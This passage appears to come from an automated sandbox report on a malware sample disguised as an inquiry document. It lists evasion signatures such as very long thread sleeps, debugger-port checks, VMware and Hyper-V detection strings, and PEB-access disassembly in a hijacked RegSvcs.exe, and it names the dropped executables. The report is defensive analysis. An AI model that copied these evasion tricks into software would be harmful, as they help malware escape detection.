            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, File source: Process Memory Space: Inquiry PR#27957.bat.exe PID: 5748, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: fuqwoDzun.exe PID: 7596, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\sfc.exe, API/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: 2CD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: 2F20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: 2CD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: 8E10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: 9E10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: A010000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Memory allocated: B010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 930000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 2730000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 2560000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 8480000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 6A60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: 9480000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Memory allocated: A480000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 9_2_0166096E rdtsc 9_2_0166096E
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 3186
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5521
            Source: C:\Windows\SysWOW64\sfc.exe, Window / User API: threadDelayed 9654
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, API coverage: 0.7 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, API coverage: 0.3 %
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe TID: 5980, Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe TID: 6816, Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520, Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464, Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524, Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508, Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe TID: 7600, Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe TID: 7672, Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084, Thread sleep count: 9654 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084, Thread sleep time: -19308000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084, Thread sleep count: 319 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 8084, Thread sleep time: -638000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148, Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148, Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148, Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148, Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe TID: 8148, Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exe, Last function: Thread delayed
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Thread delayed: delay time: 30000
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Thread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Thread delayed: delay time: 922337203685477
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO#l
            Source: firefox.exe, 00000019.00000002.2099036367.00000121CCFCC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
            Source: fuqwoDzun.exe, 0000000A.00000002.1474674839.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3787723829.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sfc.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0166096E rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00417913 LdrLoadDll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016225E0 mov eax, dword ptr fs:[00000030h]9_2_016225E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C5ED mov eax, dword ptr fs:[00000030h]9_2_0165C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C5ED mov eax, dword ptr fs:[00000030h]9_2_0165C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E5CF mov eax, dword ptr fs:[00000030h]9_2_0165E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E5CF mov eax, dword ptr fs:[00000030h]9_2_0165E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016265D0 mov eax, dword ptr fs:[00000030h]9_2_016265D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A5D0 mov eax, dword ptr fs:[00000030h]9_2_0165A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A5D0 mov eax, dword ptr fs:[00000030h]9_2_0165A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A05A7 mov eax, dword ptr fs:[00000030h]9_2_016A05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016445B1 mov eax, dword ptr fs:[00000030h]9_2_016445B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016445B1 mov eax, dword ptr fs:[00000030h]9_2_016445B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622582 mov eax, dword ptr fs:[00000030h]9_2_01622582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622582 mov ecx, dword ptr fs:[00000030h]9_2_01622582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01654588 mov eax, dword ptr fs:[00000030h]9_2_01654588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E59C mov eax, dword ptr fs:[00000030h]9_2_0165E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC460 mov ecx, dword ptr fs:[00000030h]9_2_016AC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164A470 mov eax, dword ptr fs:[00000030h]9_2_0164A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E443 mov eax, dword ptr fs:[00000030h]9_2_0165E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA456 mov eax, dword ptr fs:[00000030h]9_2_016DA456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161645D mov eax, dword ptr fs:[00000030h]9_2_0161645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164245A mov eax, dword ptr fs:[00000030h]9_2_0164245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E420 mov eax, dword ptr fs:[00000030h]9_2_0161E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C427 mov eax, dword ptr fs:[00000030h]9_2_0161C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A6420 mov eax, dword ptr fs:[00000030h]9_2_016A6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A430 mov eax, dword ptr fs:[00000030h]9_2_0165A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658402 mov eax, dword ptr fs:[00000030h]9_2_01658402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016204E5 mov ecx, dword ptr fs:[00000030h]9_2_016204E5
